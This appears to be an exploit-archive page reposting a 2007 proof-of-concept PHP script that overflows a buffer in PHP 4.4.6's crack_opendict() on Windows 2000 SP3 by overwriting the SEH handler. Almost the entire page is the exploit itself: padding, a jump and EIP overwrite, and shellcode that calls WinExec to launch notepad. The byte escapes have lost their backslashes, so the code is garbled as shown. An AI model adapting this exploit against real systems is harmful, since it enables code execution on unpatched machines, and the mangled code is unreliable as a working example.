Home / os / solaris

php_446_crack_opendict_local_bof.txt

Posted on 09 March 2007

<?php //PHP 4.4.6 crack_opendict() local buffer overflow poc exploit //win2k sp3 version / seh overwrite method //to be launched from the cli // by rgod // site: http://retrogod.altervista.org if (!extension_loaded("crack")){ die("you need the crack extension loaded."); } $____scode= "xebx1b". "x5b". "x31xc0". "x50". "x31xc0". "x88x43x59". "x53". "xbbxcax73xe9x77". //WinExec "xffxd3". "x31xc0". "x50". "xbbx5cxcfxe9x77". //ExitProcess "xffxd3". "xe8xe0xffxffxff". "x63x6dx64". "x2e". "x65". "x78x65". "x20x2f". "x63x20". "start notepad & "; $jmp="xebx06x06xeb"; // jmp short $eip="x86xa0xf8x77"; // call ebx, ntdll.dll $____suntzu.=str_repeat("A",3216); $____suntzu.=$jmp.$eip.str_repeat("x90",12).$____scode; crack_opendict($____suntzu); ?> original url: http://retrogod.altervista.org/php_446_crack_opendict_local_bof.html

 

TOP